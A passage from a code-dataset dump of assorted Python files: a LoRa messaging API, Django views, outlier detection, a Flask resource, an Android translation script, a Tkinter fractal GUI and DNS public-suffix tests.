understand why this difference, but you can imaging\n # the gateway is lisening for messages from any node and the\n # nodes only want to send messages to the gateway.\n if self.is_gateway:\n self.lora = LoRa(mode=LoRa.LORA, rx_iq=True, region=loraAPI._LORA_REGION)\n else:\n self.lora = LoRa(mode=LoRa.LORA, tx_iq=True, region=loraAPI._LORA_REGION)\n\n self.sock = socket.socket(socket.AF_LORA, socket.SOCK_RAW)\n self.sock.setblocking(False)\n\n def send(self, message):\n package = struct.pack(loraAPI._LORA_NODE_PKG_FORMAT % len(message), self.device_id, len(message), message)\n self.sock.send(package)\n print(\"{}\\n{} ({}) SENT\".format(message, self.device_name, self.device_colour), end='')\n\n def to_gateway(self, submits, requests):\n\n communique = {} # empty dictionary\n\n # Only add submits if there's a dictionary of one or more submissions\n if isinstance(submits,(dict,)) and len(submits) > 0:\n communique[\"submits\"] = submits\n # elif submits is not None:\n # print(\"create_message_to_gateway() needs a of length > 0, or None, as first parameter\")\n\n if isinstance(requests,(list,)):\n communique[\"requests\"] = requests\n # elif requests is not None:\n # print(\"create_message_to_gateway() needs a of length > 0, or None, as second parameter\")\n\n if len(communique) == 0:\n return False # Message not sent\n\n self.send(json.dumps(communique))\n return True\n\n def to_node(responses):\n\n communique = {} # empty dictionary\n\n # Only add responses if there's a dictionary of one or more responses\n if isinstance(responses,(dict,)) and len(responses) > 0:\n communique[\"responses\"] = responses\n elif responses is not None:\n print(\"create_message_to_node() needs a of length > 0, or None, as a parameter\")\n\n if len(communique) > 0:\n return communique\n else:\n return None\n\n def to_json(self, data):\n return json.dumps(data)\n\n def from_json(self, text):\n return json.loads(text)\n\n def debug(self):\n print(\"Is Gateway: %s\" % self.is_gateway)\n print(\"Device ID : %d\" % self.device_id)\n print(\"Region : %s\" % self.lora)\n print(\"Socket : %s\" % self.sock)\n\n def receive(self):\n package = self.sock.recv(512)\n if (len(package) > 2):\n package_length = package[1]\n node_device_id, message_length, message = struct.unpack(loraAPI._LORA_GATEWAY_PKG_FORMAT % package_length, package)\n\n # If the uart = machine.UART(0, 115200) and os.dupterm(uart) are set in the boot.py this print should appear in the serial port\n print('Message from Node %d: %s' % (node_device_id, message))\n\n acknowledgement_package = struct.pack(loraAPI._LORA_PKG_ACK_FORMAT, node_device_id, 1, 200)\n # lora_sock.send(ack_package)\n self.sock.send(acknowledgement_package)\n\n def acknowledge(self):\n chrono = Timer.Chrono()\n chrono.start()\n waiting_ack = True\n while(waiting_ack):\n\n print(\".\", end=\"\")\n if (chrono.read() > loraAPI._LORA_ACKNOWLEDGEMENT_TIMEOUT):\n print(\"NO ACK\") # No acknowledgement receivedself.\n break\n\n package = self.sock.recv(256)\n if (len(package) > 0):\n device_id, package_len, ack = struct.unpack(loraAPI._LORA_PKG_ACK_FORMAT, package)\n if (device_id == self.device_id):\n if (ack == 200):\n waiting_ack = False\n # If the uart = machine.UART(0, 115200) and os.dupterm(uart) are set in the boot.py this print should appear in the serial port\n print(\"ACK\") # Achnowledgement recieved, message understood\n else:\n waiting_ack = False\n # If the uart = machine.UART(0, 115200) and os.dupterm(uart) are set in the boot.py this print should appear in the serial port\n print(\"NACK\") # Achnowledgement recieved, message NOT understood\n time.sleep(0.1)\n","sub_path":"Phase 3/node1/lib/lora_api.py","file_name":"lora_api.py","file_ext":"py","file_size_in_byte":6170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"201831203","text":"import random\n\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom django.core.paginator import Paginator\nfrom django.shortcuts import get_object_or_404, redirect, render\nfrom course.models import *\nfrom course.services import get_enrolled_subjects, get_recommmendations\nfrom .forms import *\nfrom .models import Student\n\n\ndef register(request):\n if request.method == 'POST':\n form = UserRegisterForm(request.POST)\n if form.is_valid():\n form.save()\n username = form.cleaned_data.get('username')\n messages.success(\n request, f'Your account has been created! You are now able to log in')\n messages.success(\n request, f'Please Update your profile first.')\n return redirect('users-login')\n else:\n form = UserRegisterForm()\n return render(request, 'users/register.html', {'form': form})\n\n\n@login_required\ndef profile(request):\n account = get_object_or_404(Student, account = request.user)\n context = {'home_page': 'active',\n 'account' : account,\n }\n return render(request, 'users/profile.html', context)\n\n@login_required\ndef EditProfile(request):\n student = get_object_or_404(Student, account = request.user)\n if request.method == \"POST\":\n p_form = EditProfileForm(request.POST,request.FILES, instance= student)\n u_form = UserUpdateForm(request.POST, instance= request.user)\n if p_form.is_valid() and u_form.is_valid():\n u_form.save()\n p_form.save()\n messages.success(request,'Your Profile has been updated!')\n return redirect('users-profile')\n else:\n messages.error(request, p_form.errors)\n messages.error(request, u_form.errors)\n else:\n p_form= EditProfileForm()\n u_form =UserUpdateForm()\n context={'p_form': p_form, 'u_form': u_form}\n return render(request, 'users/update-profile.html', context )\n\n\n\n","sub_path":"dbd-course-recommender/course_recommender/users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"188880519","text":"# Mean/median/std\n# LOF\n# Binning\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.neighbors import LocalOutlierFactor\nimport numpy as np\npd.options.display.width=0\n\ndef localOutlierFactor(data, predict, k):\n \n # LOF\n clf=LocalOutlierFactor(n_neighbors=k+1, algorithm='auto', contamination=0.1, n_jobs=-1)\n clf.fit(data)\n\n # Computer k-neatest-point distance\n predict['k distances']=clf.kneighbors(predict)[0].max(axis=1)\n\n # Record LOF,process negative values\n predict['local outlier factor']=-clf._decision_function(predict.iloc[:, :-1])\n return predict\n\ndef plotLOF(result, method, k):\n \n # Plot LOF\n plt.rcParams['axes.unicode_minus']=False\n plt.figure(figsize=(8, 4)).add_subplot(111)\n plt.scatter(result[result['local outlier factor']>method].index,\n result[result['local outlier factor']>method]['local outlier factor'], c='blue', s=50,\n marker='.', alpha=None,\n label='Outliers')\n plt.scatter(result[result['local outlier factor']<=method].index,\n result[result['local outlier factor']<=method]['local outlier factor'], c='green', s=50,\n marker='.', alpha=None, label='Normal')\n plt.hlines(method, -2, 2+max(result.index), linestyles='--')\n plt.xlim(-2, 2+max(result.index))\n plt.title('K='+str(k)+', LOF Outlier Detector', fontsize=13)\n plt.xlabel('Index', fontsize=15)\n plt.ylabel('Outlier Factor', fontsize=15)\n plt.legend()\n fig1=plt.gcf()\n plt.show()\n fig1.savefig('outliers_'+str(k)+'.png')\n\ndef lof(data, predict=None, k=5, method=1, plot=False):\n \n # Process predict data\n predict=data.copy()\n\n # Compute LOF\n predict=localOutlierFactor(data, predict, k)\n if plot == True:\n plotLOF(predict, method, k)\n\n # Determine ouliers and inliers\n outliers=predict[predict['local outlier factor']>method].sort_values(by='local outlier factor')\n inliers=predict[predict['local outlier factor']<=method].sort_values(by='local outlier factor')\n return outliers, inliers\n\ndef readData(file_name):\n df=pd.read_csv(file_name, sep=',')\n return df\n\ndef openFile(file_name):\n f=open(file_name, 'w')\n return f\n\ndef equalWidthBinning(myData, attr, f):\n # Compute min and max values, then add 1 to each side.\n minReactionNums = myData[attr].min() - 1\n maxReactionNums = myData[attr].max() + 1\n\n # Create even spaced bins using min and max\n n_bin = 10 # Number of bin\n step = (maxReactionNums - minReactionNums) / n_bin\n bins = np.arange(minReactionNums, maxReactionNums + step, step)\n\n # Look at new bins. This is equi-width binning\n reactionBins = np.digitize(myData[attr], bins)\n\n # Count the number of values in each bin\n reactionBinCounts = np.bincount(reactionBins)\n print(\"\\n\\nBins are: \\n \", reactionBins)\n f.write(\"\\n\\nBins are: \\n \"+str(reactionBins)+'\\n')\n print(\"\\nBin count is \", reactionBinCounts)\n f.write(\"\\nBin count is : \"+str(reactionBinCounts)+'\\n')\n\n # Create a new variable ReactionGroups that groups posts into bins, e.g. < 200, 200-400, etc.\n # For this example, I use the bins created above\n myData['bin_group'] = np.digitize(myData[attr], bins)\n print(\"\\nAfter bin_group is added we have:\\n\", myData[:10])\n f.write(\"\\nAfter bin_group is added we have:\\n\"+str(myData[:10])+'\\n')\n\n # Another option to see actual bins\n myData['bin_ranges'] = pd.cut(myData[attr], bins)\n\n # Print Bin Counts in different ways\n print(\"\\nBin Counts\\n\")\n f.write(\"\\nBin Counts\\n\")\n print(myData['bin_ranges'].value_counts())\n f.write(str(myData['bin_ranges'].value_counts())+'\\n')\n\n\ndef equalDepthBinning(myData, attr, f, mode, bins):\n names = range(1, 4)\n # myData['bin_group'] = np.digitize(myData[attr], bins)\n myData[mode+'_bin_group'] = pd.cut(myData[attr], bins, labels=names)\n\n #Check the data to see the new column\n print(\"\\n New column of data:\")\n f.write(\"\\n New column of data: \\n\")\n print(myData[:10])\n f.write(str(myData[:10])+'\\n')\n\n # Print Bin Counts in different ways\n print(\"\\nBin Counts\\n\")\n f.write(\"\\nBin Counts\\n\")\n print(myData[mode+'_bin_group'].value_counts())\n f.write(str(myData[mode+'_bin_group'].value_counts())+'\\n')\n return myData\n\n\nif __name__ == \"__main__\":\n\n print('Running statistical record, LOF, and Binning')\n df=readData('../data/energy_commercial.csv')\n\n f=openFile('commercial_record.txt')\n # Mean/median/std data\n f.write('Mean/median/std before LOF\\n'+str(df.describe()))\n\n # LOF algorithm\n # Set LOF score to 1\n x=[0, 1]\n df1=df.drop(df.columns[x], axis=1)\n\n f.write('\\n\\nLOF Algorithm:\\n')\n for k in [100, 200, 500]:\n outliers, inliers=lof(data=df1, k=k, plot=True, method=1)\n print('k='+str(k)+' : '+str(len(outliers))+' outliers')\n f.write('k='+str(k)+' : '+str(len(outliers))+' outliers\\n')\n outliers.to_csv('outliers_'+str(k)+'.csv', sep=',')\n\n if k==200:\n outlier_df=outliers\n\n # Choose k=500 result\n out_index=outlier_df.index.to_list()\n f.write('\\nOutlier Indexes: '+str(out_index)+'\\n')\n\n # Remove outliers by outlier indexes\n df=df.drop(out_index)\n \n # Mean/median/std data\n f.write('\\nMean/median/std after LOF\\n'+str(df.describe()))\n\n # Test by LOF\n # df2=df.drop(df.columns[x], axis=1)\n # outliers, inliers=lof(data=df2, k=500, plot=True, method=1)\n # print(len(outliers))\n\n # Equal-width binning\n binning_attr=['elec_score', 'gas_score']\n f.write('\\n\\n\\nEqual-width binning: \\n')\n for i in binning_attr:\n df1=df.copy()\n f.write('\\nattr: '+i+'\\n')\n equalWidthBinning(df1, i, f)\n\n # Equal-depth binning\n df2=df.copy()\n f.write('\\nEqual-depth binning: \\n')\n f.write('\\nattr: elec_score\\n')\n\n # Get elec/gas binning\n bins1=[-1, 1720, 10991, 1181389]\n bins2=[-1, 1674, 24027, 4368494]\n df2=equalDepthBinning(df2, 'elec_mwh', f, 'elec', bins1)\n df=equalDepthBinning(df2, 'gas_mcf', f, 'gas', bins2)\n df.to_csv('cleaned_energy_commercial.csv', ',', index=False)\n\n f.close()","sub_path":"buildings_and_industry/proj2_data_analysis/commercial_process/analysis/outlier_process.py","file_name":"outlier_process.py","file_ext":"py","file_size_in_byte":6139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"317256775","text":"import numpy as np\nfrom scipy.linalg import null_space\nfrom numpy.linalg import inv\n\n'''\nParameters Explanation:\nmat: input noisy matrix\nm: Parameters of NR_B, controlling the extent of matrix modification\neps1: Value added to the whole matrix in preprocessing step\neps2: Value added to the diagonal in preprocessing step\n'''\n\ndef NR_B(mat, m, eps1, eps2):\n \n # preprocessing\n n = mat.shape[0]\n mat = mat + eps1 + eps2 * np.eye(n)\n \n # change into transition matrix\n P1 = mat / mat.sum(1).reshape(-1, 1)\n P2 = m * P1.dot(inv(((m-1)*np.eye(n) + P1)))\n \n # minus the smallest negative value from each row with negative numbers\n process = lambda x:min(x,0) \n row_fac = np.zeros(n)\n for i in range(n):\n row_fac[i] = process(P2.min(1)[i])\n P2 = P2 - row_fac.reshape(-1,1) \n P2 = P2 / P2.sum(1).reshape(-1, 1)\n \n # compute the stationary distribution and the output matrix\n stationary_d = null_space((P2 - np.eye(n)).T)\n stationary_d = stationary_d / stationary_d.sum()\n if stationary_d[0].shape[0]==0:\n print('The stationary distribution does not exist!')\n elif stationary_d[0].shape[0]>1:\n print('The stationary distribution is not unique!')\n else :\n net_new = np.diag(abs(stationary_d.T)[0]).dot(P2)\n net_new = net_new + net_new.T\n output_network = net_new-np.diag(np.diag(net_new))\n output_network = output_network / output_network.max()\n return output_network\n","sub_path":"methods/NR_B.py","file_name":"NR_B.py","file_ext":"py","file_size_in_byte":1484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"205987291","text":"from nfmanagementapi.models import ServiceObject\nfrom nfmanagementapi.schemata import ServiceObjectSchema\nfrom marshmallow.exceptions import ValidationError\nfrom .BaseResource import BaseResource\nfrom flask import request\nfrom app import db\nfrom uuid import uuid4\n\npath = 'service_objects'\nendpoint = 'service_objects'\n\n\nclass ServiceObjectCollectionResource(BaseResource):\n def get(self):\n \"\"\"List Service Objects\n ---\n description: List all service objects\n tags:\n - Service Objects\n responses:\n 200:\n content:\n application/json:\n schema: \n type: array\n items: ServiceObjectSchema\n \"\"\"\n objects = ServiceObject.query.all()\n schema = ServiceObjectSchema(many = True)\n return schema.dump(objects)\n\n def post(self):\n \"\"\"Create service object\n ---\n description: Create a service object\n tags:\n - Service Objects\n requestBody:\n content:\n application/json:\n schema: ServiceObjectSchema\n responses:\n 201:\n description: Created\n content:\n application/json:\n schema: ServiceObjectSchema\n 422:\n description: Unprocessable Entity\n content:\n application/json:\n schema: MessageSchema\n \"\"\"\n messages = []\n json_data = request.get_json()\n try:\n data = ServiceObjectSchema().load(json_data)\n except ValidationError as err:\n for msg in err.messages:\n messages.append(\"{}: {}\".format(msg, err.messages[msg]))\n return {\"messages\": messages}, 422\n \n\n object = ServiceObject()\n error = False\n for key in data:\n try:\n setattr(object, key, data[key])\n except ValueError as e:\n error = True\n messages.append(e.args[0])\n if error:\n return {\"messages\": messages}, 422\n db.session.add(object)\n db.session.commit()\n db.session.refresh(object)\n return ServiceObjectSchema().dump(object)","sub_path":"nfmanagementapi/resources/ServiceObjectCollectionResource.py","file_name":"ServiceObjectCollectionResource.py","file_ext":"py","file_size_in_byte":2245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"648538720","text":"from ChainingHashTableMap import ChainingHashTableMap\nfrom ArrayStack import ArrayStack\nfrom ArrayQueue import ArrayQueue\ndef create_palindrome(letters):\n cht=ChainingHashTableMap()\n for i in letters:\n try:\n cht[i]+=1\n except:\n cht[i]=1\n queue=ArrayQueue()\n stack=ArrayStack()\n for i in cht:\n for j in range(cht[i]//2):\n queue.enqueue(i)\n stack.push(i)\n for i in cht:\n if cht[i]%2==1:\n queue.enqueue(i)\n break\n while not stack.is_empty():\n queue.enqueue(stack.pop())\n return \"\".join([queue.dequeue() for i in range(len(queue))])\ndef main():\n print(create_palindrome(\"asdfnmbemaehbdsafbmdsfbdnsfbewhreruituih\"))\n \nmain()\n","sub_path":"lab/14/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"587660766","text":"# -*- coding: utf-8 -*-\r\nimport os\r\nfrom tkinter import *\r\ntry:\r\n from PIL import Image, ImageTk\r\nexcept IOError:\r\n print(\"Impossible d'importer PIL\")\r\n import Image\r\n \r\nfrom M_fractale import *\r\nfrom M_param import *\r\nfrom LanguageGUI_FR import *\r\n\r\n#Classe de l'interface, permet d'initialiser la fenetre principale\r\n#et ses dépendances\r\n#\r\n#TODO: Multi-threads -/ Menu + affichage\r\n# Sauvegarde format jpg\r\n# Créer sous fonctions pour éviter créations de widgets rédondante\r\n#\r\n\r\nDEF_FP=\"C:\\\\Users\\Wyvern\\Google Drive\\Perso\\Python\\SoftFrac\\img\\\\\" \r\nDEF_WIDTH=500\r\nEF_HEIGHT=500\r\nDEF_BORDERWIDTH=1\r\nDEF_ZOOM=800\r\nDEF_IT_MAX=40\r\n\r\nclass MainGUI: \r\n\r\n #Constructeur\r\n def __init__(self): \r\n \r\n #Stockage de la langue qui sera utilisée dans la GUI\r\n self.lang=LanguageGUI_FR()\r\n\r\n #Création Interface principale + titre\r\n self._win=Tk()\r\n welcome_label = Label(self._win, text=self.lang.main_menu.label_title)\r\n welcome_label.pack() \r\n \r\n #Creation de la structure de la fenetre\r\n winMain=Frame(self._win,width=DEF_WIDTH,height=DEF_HEIGHT,borderwidth=DEF_BORDERWIDTH)\r\n winMain.pack(fill=\"both\") \r\n \r\n button_quit=Button(winMain,text=self.lang.main_menu.quit_button,\r\n command=self._win.quit)\r\n button_quit.pack()\r\n\r\n button_save=Button(winMain,text=self.lang.main_menu.save_button,command=self.save)#TODO : ajouter command=self.save)\r\n button_save.pack(side=\"right\") \r\n \r\n #Variables de stockage des paramètres, associées aux checkbox\r\n self.value_checkbox_red=IntVar()\r\n self.value_checkbox_green=IntVar()\r\n self.value_checkbox_blue=IntVar()\r\n self.value_entry_zoom=IntVar()\r\n self.value_entry_dimX=IntVar()\r\n self.value_entry_dimY=IntVar()\r\n self.value_entry_fraccenterX=IntVar()\r\n self.value_entry_fraccenterY=IntVar()\r\n\r\n checkbox_red=Checkbutton(winMain,text=self.lang.param.checkbox_red,variable=self.value_checkbox_red)\r\n checkbox_blue=Checkbutton(winMain,text=self.lang.param.checkbox_green,variable=self.value_checkbox_green)\r\n checkbox_green=Checkbutton(winMain,text=self.lang.param.checkbox_blue,variable=self.value_checkbox_blue)\r\n \r\n checkbox_red.pack(side=\"left\")\r\n checkbox_blue.pack(side=\"left\")\r\n checkbox_green.pack(side=\"left\")\r\n \r\n button_exec=Button(winMain,text=self.lang.main_menu.exec_button, command=self.execFrac)\r\n button_exec.pack(side=\"bottom\")\r\n\r\n label_entry_zoom = Label(winMain, text=self.lang.param.zoom)\r\n label_entry_zoom.pack(side=\"top\") \r\n\r\n entry_zoom=Entry(winMain,text=self.value_entry_zoom,width=30)\r\n entry_zoom.pack(side=\"bottom\")\r\n\r\n label_entry_dimX = Label(winMain, text=self.lang.param.image_width)\r\n label_entry_dimX.pack(side=\"bottom\") \r\n\r\n entry_dimX=Entry(winMain,text=self.value_entry_dimX,width=30)\r\n entry_dimX.pack(side=\"bottom\") \r\n\r\n label_entry_dimY = Label(winMain, text=self.lang.param.image_height)\r\n label_entry_dimY.pack(side=\"bottom\") \r\n\r\n entry_dimY=Entry(winMain,text=self.value_entry_dimY,width=30)\r\n entry_dimY.pack(side=\"bottom\")\r\n \r\n label_entry_fraccenterX = Label(winMain, text=self.lang.param.fractal_center_x)\r\n label_entry_fraccenterX.pack(side=\"bottom\") \r\n\r\n entry_fraccenterX=Entry(winMain,text=self.value_entry_fraccenterX,width=30)\r\n entry_fraccenterX.pack(side=\"bottom\")\r\n\r\n label_entry_fraccenterY = Label(winMain, text=self.lang.param.fractal_center_y)\r\n label_entry_fraccenterY.pack(side=\"bottom\") \r\n\r\n entry_fraccenterY=Entry(winMain,text=self.value_entry_fraccenterY,width=30)\r\n entry_fraccenterY.pack(side=\"bottom\")\r\n \r\n \r\n def execFrac(self):\r\n param=M_param.Param([self.value_checkbox_red.get(),self.value_checkbox_green.get(), self.value_checkbox_blue.get()],\r\n self.value_entry_zoom.get(),\r\n [self.value_entry_fraccenterX.get(),self.value_entry_fraccenterY.get()],\r\n DEF_IT_MAX,\r\n [self.value_entry_dimX.get(),self.value_entry_dimY.get()])\r\n welcome_label = self.lang.main_menu.fractal_creation\r\n img=newImg\r\n img=makeFrac(param) \r\n img.show()\r\n displayed_img= ImageTk.PhotoImage(img)\r\n label = Tk.Label(displayed_img)\r\n label.pack()\r\n filename=format(time.clock())\r\n\r\n def save(self):\r\n msgBoxConfirm=Tk()\r\n filename=StringVar()\r\n entry_name=Entry(msgBoxConfirm,text=filename,width=30)\r\n entry_name.pack(side=\"left\") \r\n img.save(DEF_FP+filename+'.jpg')\r\n \r\n#Demarrage Interface\r\nfenetre=MainGUI()\r\nfenetre._win.mainloop()\r\nfenetre._win.destroy()\r\n","sub_path":"V_MainGUI.py","file_name":"V_MainGUI.py","file_ext":"py","file_size_in_byte":4981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"91692655","text":"#!/usr/bin/env python3\n# -*- coding: UTF-8 -*-\n\nimport os\nimport sys\nimport re\n\nfrom termcolor import colored\n\nlang_map = {\n 'spanish': 'es',\n 'french': 'fr',\n}\n\ntemplate_dir = 'template'\nsource_dir = 'source'\nresult_dir = 'target'\nlanguage_dir = 'language'\napp_name = None\nselect_lang = None\nlanguage_separator = '@@@'\nkey_not_find_tag = '#:#:#:#'\n\n\ndef usage():\n print(\"\"\"\n %s \n 先找要翻译的template目录, 再找准备好的language文件. 完成翻译, 在target目录中生成翻译好的xml.\n\n -h 查看帮助文档\n\n argv1 选择APP的template目录. 如: fitness\n argv2 选择要翻译成什么语言. 如: spanish\n \"\"\" % sys.argv[0])\n\n exit(1)\n\n\ndef get_app_name():\n n = 0\n app_list = []\n\n print('-------------------------------------')\n print('可选择的APP tempalte:')\n\n for dir in os.listdir(template_dir):\n print(' %d : %s' % (n, dir))\n app_list.append(dir)\n n += 1\n print('-------------------------------------')\n app_index = input(colored('你选择哪个APP template, 输入前面数字即可: ', 'green'))\n\n if n > 0:\n return app_list[int(app_index)]\n else:\n print('找不到模板template!')\n exit(1)\n\n\ndef get_lang():\n n = 0\n print('\\n-------------------------------------')\n print('可以翻译成哪些语言:')\n print(os.path.join(language_dir, app_name))\n lang_list = find_lang_list(os.path.join(language_dir, app_name))\n\n for lang in lang_list:\n print(' %d : %s' % (n, lang))\n n += 1\n print('-------------------------------------')\n select_lang_index = input(colored('要翻译成什么语言, 输入前面的数字即可: ', 'green'))\n\n if n > 0:\n return lang_list[int(select_lang_index)]\n else:\n print('找不到可用的翻译language文件!')\n exit(1)\n\n\ndef find_lang_list(app_language_dir):\n lang_list = []\n for dir in os.listdir(app_language_dir):\n if os.path.isdir(os.path.join(app_language_dir, dir)):\n find_lang_list(os.path.join(app_language_dir, dir))\n elif os.path.isfile(os.path.join(app_language_dir, dir)):\n lang_group = re.match(r'^([a-zA-Z]+)-.*.xml', dir)\n if lang_group and lang_group.group(1) not in lang_list:\n lang_list.append(lang_group.group(1))\n\n return lang_list\n\n\ndef load_language(load_lang_subfile):\n lang_kv = {}\n for file in os.listdir(load_lang_subfile):\n\n if os.path.isdir(os.path.join(load_lang_subfile, file)):\n load_lang_subfile = os.path.join(load_lang_subfile, file)\n load_language(os.path.join(load_lang_subfile, file))\n elif os.path.isfile(os.path.join(load_lang_subfile, file)):\n lang_group = re.match(r'([a-zA-Z]+)-(.*.xml)', file)\n if lang_group:\n stings_name = lang_group.group(2)\n else:\n continue\n\n if lang_kv.get(lang_group.group(2)) is None:\n lang_kv[lang_group.group(2)] = {}\n\n if lang_group.group(1) == select_lang:\n lang_fd = open(os.path.join(load_lang_subfile, file), 'r')\n for line in lang_fd:\n if len(line.split(language_separator, 1)) == 2:\n (k, v) = line.split(language_separator, 1)\n lang_kv[stings_name][k] = v.strip()\n return lang_kv\n\n\ndef write_target_xml(content, target_xml):\n dir = re.sub(r'%s[^/]*$' % os.sep, '', target_xml)\n if not os.path.isdir(dir):\n os.makedirs(dir)\n\n target_xml_fd = open(target_xml, 'w')\n target_xml_fd.write(content)\n target_xml_fd.close()\n\n\ndef create_target_lang_dir(dir):\n if not os.path.isdir(dir):\n os.makedirs(dir)\n\n\ndef translate():\n lang_kv = load_language(os.path.join(language_dir, app_name))\n\n for template_file in os.listdir(os.path.join(template_dir, app_name)):\n content = ''\n template_fd = open(os.path.join(template_dir, app_name, template_file), 'r')\n\n target_file = os.path.join(result_dir, app_name, 'values-%s' % lang_map.get(select_lang), template_file)\n for line in template_fd:\n if '
' not in line and '' not in line:\n content += line\n continue\n\n key_group = re.match(r'.*(string|item).*name=\"([^\"]+)\"', line)\n if key_group:\n key = key_group.group(2)\n\n if lang_kv.get(template_file).get(key) is None:\n lang_kv[template_file][key] = key_not_find_tag\n print(colored('key 不存在 -> %s : %s' % (target_file, line.strip()), 'red').strip())\n\n string_list = re.split(r'>.*', line)\n content += string_list[0] + '>' + lang_kv.get(template_file).get(key) + '' + string_list[1]\n\n print(colored('生成 : %s' % target_file, 'green'))\n write_target_xml(content, target_file)\n\n\nif __name__ == '__main__':\n if len(sys.argv) >= 2:\n app_name = sys.argv[1]\n\n if len(sys.argv) >= 3:\n select_lang = sys.argv[2]\n\n if app_name == '-h':\n usage()\n\n if app_name is None or not os.path.isdir(os.path.join(template_dir, app_name)):\n app_name = get_app_name()\n\n if select_lang is None or select_lang not in find_lang_list(os.path.join(language_dir, app_name)):\n select_lang = get_lang()\n \n print()\n translate()\n\n\n############# change log ##############\n'''\n2017-9-25 18:00\n增加两个变量: language_separator , key_not_find_tag 方便以后更换这些特殊符号.\n\n'''\n\n","sub_path":"old/translate_0923:4_py/0924_gen_language_xml.py","file_name":"0924_gen_language_xml.py","file_ext":"py","file_size_in_byte":5621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"13334201","text":"from unittest import mock, TestCase\n\nimport dns\n\nimport psl_dns\n\n\nclass TestBase(TestCase):\n def setUp(self):\n mock_resolver_class = mock.patch('dns.resolver.Resolver', autospec=True).start()\n self.mock_resolver = mock_resolver_class.return_value\n self.mock_resolver.query.return_value = [mock.create_autospec(dns.rdata.Rdata).return_value]\n self.addCleanup(mock.patch.stopall)\n\n self.psl = psl_dns.PSL()\n\n def get_mock_context_manager(self, value):\n if hasattr(value, '__call__'):\n return mock.patch.object(self.mock_resolver, 'query', side_effect=value)\n\n def _query_side_effect(_domain, rdatatype, **_):\n if isinstance(value, dict):\n records = value[rdatatype]\n else:\n records = value if isinstance(value, list) else [value]\n\n answers = []\n for record in records:\n answers.append(mock.create_autospec(dns.rdata.Rdata).return_value)\n answers[-1].to_text.return_value = record\n return answers\n\n return mock.patch.object(self.mock_resolver, 'query', side_effect=_query_side_effect)\n\n\nclass TestMisc(TestBase):\n def test_get_checksum(self):\n checksum = 'd205f587d61c6bbf05bec818776da1dd030ce68f2e8912fea732158b9a33cc54'\n with self.get_mock_context_manager('\"1556058819 {}\"'.format(checksum)):\n self.assertEqual(self.psl.get_checksum(), checksum)\n\n def test_nxdomain(self):\n with self.get_mock_context_manager(dns.resolver.NXDOMAIN):\n with self.assertRaises(psl_dns.exceptions.ResolverError):\n self.psl.query('iana.org', dns.rdatatype.PTR)\n\n def test_get_rules(self):\n mock_records = {dns.rdatatype.PTR: ['*.'], dns.rdatatype.TXT: ['\"*.ck\"', '\"!www.ck\"']}\n with self.get_mock_context_manager(mock_records):\n self.assertEqual(self.psl.get_rules('www.ck.'), {'!www.ck', '*.ck', '*'})\n self.mock_resolver.query.assert_called()\n\n\nclass TestGetPublicSuffix(TestBase):\n def assertGetPublicSuffix(self, domain, suffix):\n mock_answer = (suffix.rstrip('.') + '.').encode('idna').decode('ascii')\n with self.get_mock_context_manager(mock_answer):\n self.assertEqual(self.psl.get_public_suffix(domain), suffix)\n self.mock_resolver.query.assert_called()\n\n def test_ascii(self):\n self.assertGetPublicSuffix('io', 'io')\n self.assertGetPublicSuffix('dedyn.io', 'dedyn.io')\n self.assertGetPublicSuffix('desec.io', 'io')\n self.assertGetPublicSuffix('desec.io.', 'io.')\n\n # Also test lettercase normalization\n self.assertGetPublicSuffix('IO', 'io')\n self.assertGetPublicSuffix('s3.AmazonAWS.com', 's3.amazonaws.com')\n\n def test_punycode(self):\n self.assertGetPublicSuffix('www.xn--tsting-wxa.de.co.uk', 'co.uk')\n\n def test_unicode(self):\n self.assertGetPublicSuffix('www.tösting.co.uk', 'co.uk')\n self.assertGetPublicSuffix('www.xn--55qx5d.cn.', 'xn--55qx5d.cn.')\n self.assertGetPublicSuffix('www.公司.cn.', '公司.cn.')\n self.assertGetPublicSuffix('公司.cn', '公司.cn')\n\n def test_invalid_domain(self):\n with self.assertRaises(ValueError):\n self.psl.get_public_suffix('.')\n\n with self.assertRaises(ValueError):\n self.psl.get_public_suffix('.desec.io')\n\n def test_inconsistent_labels(self):\n with self.get_mock_context_manager('dedyn.io.'):\n with self.assertRaises(ValueError):\n self.psl.get_public_suffix('www.desec.io')\n\n\nclass TestIsPublicSuffix(TestBase):\n def assertIsPublicSuffix(self, domain, suffix, value):\n mock_answer = (suffix.rstrip('.') + '.').encode('idna').decode('ascii')\n with self.get_mock_context_manager(mock_answer):\n self.assertEqual(self.psl.is_public_suffix(domain), value)\n self.mock_resolver.query.assert_called()\n\n def test_ascii(self):\n self.assertIsPublicSuffix('io', 'io', True)\n self.assertIsPublicSuffix('dedyn.io', 'dedyn.io', True)\n self.assertIsPublicSuffix('desec.io', 'io', False)\n self.assertIsPublicSuffix('desec.io.', 'io', False)\n\n def test_punycode(self):\n self.assertIsPublicSuffix('www.xn--tsting-wxa.de.co.uk', 'co.uk', False)\n\n def test_unicode(self):\n self.assertIsPublicSuffix('www.tösting.co.uk', 'co.uk', False)\n self.assertIsPublicSuffix('www.公司.cn.', '公司.cn', False)\n self.assertIsPublicSuffix('公司.cn', '公司.cn', True)\n\n def test_given_suffix(self):\n self.assertTrue(self.psl.is_public_suffix('something.ck', 'something.ck'))\n self.assertFalse(self.psl.is_public_suffix('something.ck', 'something.ck.'))\n","sub_path":"psl_dns/tests/test_querier.py","file_name":"test_querier.py","file_ext":"py","file_size_in_byte":4778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
